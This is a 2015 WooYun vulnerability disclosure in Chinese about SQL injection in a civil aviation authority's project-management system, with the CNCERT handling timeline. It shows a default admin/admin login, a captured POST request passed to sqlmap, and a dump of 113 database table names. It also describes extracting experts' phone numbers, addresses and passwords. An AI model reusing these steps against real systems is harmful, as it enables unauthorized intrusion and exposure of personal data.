当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139550

漏洞标题:中国民航总局某系统多处SQL注入漏洞打包

相关厂商:中国民航总局科技管理系统

漏洞作者: Xmyth_夏洛克

提交时间:2015-09-09 16:59

修复时间:2015-10-26 14:36

公开时间:2015-10-26 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

233333

详细说明:

URL:
**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/Login.aspx
用admin/admin登陆
所有输入框几乎都有注入。。。。也是醉了。。。

1.png


2.png


3.png


4.png


5.png


就不一一列出来了

漏洞证明:

注入点太多只证明一个注入的数据,抓post包放入sqlmap

POST /%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282
__VIEWSTATE=
%2FwEPDwUKMTMyODY0NTA4Mw9kFgICAw9kFgYCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQV5ZWFycx4ORGF0YVZhbHVlRmllbGQFBXllYXJzHgtfIURhdGFCb3VuZGdkEBULBuWFqOmDqAQyMDE1BDIwMTQEMjAxMwQyMDEyBDIwMTEEM
jAwOQQyMDA4BDIwMDcEMjAwNgQyMDA1FQsDYWxsBDIwMTUEMjAxNAQyMDEzBDIwMTIEMjAxMQQyMDA5BDIwMDgEMjAwNwQyMDA2BDIwMDUUKwMLZ2dnZ2dnZ2dnZ2dkZAIJDzwrAA0BAA8WBB8CZx4LXyFJdGVtQ291bnQCAWQWAmYP
ZBYCAgIPDxYCHgdWaXNpYmxlaGRkAg0PDxYEHg5DdXN0b21JbmZvVGV4dAV96K6w5b2V5oC75pWw77yaPGZvbnQgY29sb3I9ImJsYWNrIj4wPC9mb250PiDmgLvpobXmlbDvvJo8Zm9udCBjb2xvcj0iYmxhY2siPjE8L2ZvbnQ
%2BIOW9k%2BWJjemhte%2B8mjxmb250IGNvbG9yPSJibGFjayI%2BMTwvZm9udD4eC1JlY29yZGNvdW50ZmRkGAEFBWdkdlhNDxQrAApkZGRkZGQVAQNQSUQUKwABFCsAATJmAAEAAAD%2F%2F%2F%2F
%2FAQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEICgIAAAAGAgAAAAALAgEUKwABMmYAAQAAAP%2F%2F%2F
%2F8BAAAAAAAAAAQBAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgKAgAAAAYCAAAAAAtk0e8oSugqA4TDpriRNs8%2BkXA2PJY
%3D&__EVENTVALIDATION=%2FwEWEQLTwK2rCQLmmee%2FCQL4wa6BDQL4wbLkBAL4wYbfAwL4weqyCwL4wf6VAgKT%2BPDRDgKT%2BMS0BgKT%2BOhdApP4%2FLAIApP4wOsHAv%2FBw40DAq%2FQlx0C%2F%2FDzmAYC
%2FPDzmAYCu6uxhgjTs1eYRKV%2BpJ9s2Nrxlj2O55eRLw%3D%3D&ddlYear=all&txtXMName=123&ddlStatus=all&Button2=%E6%9F%A5%E8%AF%A2


DBA权限

dba.png


8个库

8个库.png


当前数据库113个表

[113 tables]
+-------------------------------+
| 123                           |
| ApplicationUnit               |
| CompactList_View              |
| Conceit                       |
| ConceitTime                   |
| Department                    |
| ExperUserMaster               |
| ExperUserPaper                |
| ExperUserResults              |
| Function                      |
| HY_LoginExperUser             |
| JDYJ_View                     |
| JD_Input                      |
| JD_Project_view               |
| Location                      |
| PJExpertNew_View              |
| PJExpert_View                 |
| PJ_Project_View               |
| PJ_View                       |
| PingJiang_SCCS                |
| PingJiang_View                |
| PingJing_SCCS_View            |
| PingShenView                  |
| Project                       |
| ProjectList_View              |
| ProjectPeople                 |
| ProjectPeopleView             |
| Project_SCCS                  |
| Project_SCCS_View             |
| Project_expert                |
| Project_ry                    |
| QUERY_PARA                    |
| Role                          |
| Role_Function                 |
| SB_Search_View                |
| Sheet1$                       |
| Users                         |
| VIEW1                         |
| VIEW_zaiyan                   |
| ViewCompact                   |
| ViewCompact111111111          |
| ViewContract                  |
| ViewDepartment                |
| ViewProject                   |
| ViewSPContract                |
| View_CheckZJPS                |
| View_Contract_JD              |
| View_JianDing                 |
| View_ZJ                       |
| compact                       |
| compact_htxx                  |
| compact_xmid                  |
| config                        |
| dtproperties                  |
| expert                        |
| expertJob                     |
| expertcount                   |
| gather                        |
| ht_config                     |
| ht_jfys                       |
| ht_sbyq                       |
| ht_xm                         |
| ht_xmjdap                     |
| ht_xmry                       |
| huojiang                      |
| jianding                      |
| jiandingapply                 |
| jiandingexpert                |
| jindubaogao                   |
| jindubaogao_Attitude          |
| jindubaogao_AttitudeFile      |
| jindubaogao_AttitudeFile_View |
| jindubaogao_Attitude_View     |
| jindufujian                   |
| pingjiang                     |
| pingjiangTime                 |
| pingshenyijian                |
| pj_Conceit                    |
| pj_config                     |
| pj_expertCount                |
| pj_expertJob                  |
| pj_project_expert             |
| projectView                   |
| project_conceit               |
| project_rkx                   |
| project_temp                  |
| projectbak                    |
| sysdiagrams                   |
| tp3_jfys                      |
| tp3_sbyq                      |
| tp3_xm                        |
| tp3_xmDW                      |
| tp3_xmHXR                     |
| tp3_xmjdap                    |
| tp3_xmry                      |
| tp3_xmtzze                    |
| tp4_jfys                      |
| tp4_xm                        |
| tp4_xmry                      |
| tp4_xmry_xmqk                 |
| tp5_XM                        |
| tp5_xmhjqk                    |
| tp5_xmwcdw                    |
| tp5_xmzywcr                   |
| v_contract                    |
| v_project                     |
| v_user_dept                   |
| viewjianding                  |
| viewjiandingapply             |
| viewjindu                     |
| xiangmulist                   |
| xm_pingjiang                  |
| zaiyan                        |
+-------------------------------+


专家的手机,用户名,密码,住址等等信息

信息.png


由于跑数据太慢就跑个几个用户名密码证明下

专家密码.png

修复方案:

过滤

版权声明:转载请注明来源 Xmyth_夏洛克@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-11 14:35

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。同时同步上报给国家上级信息安全协调机构。

最新状态:

暂无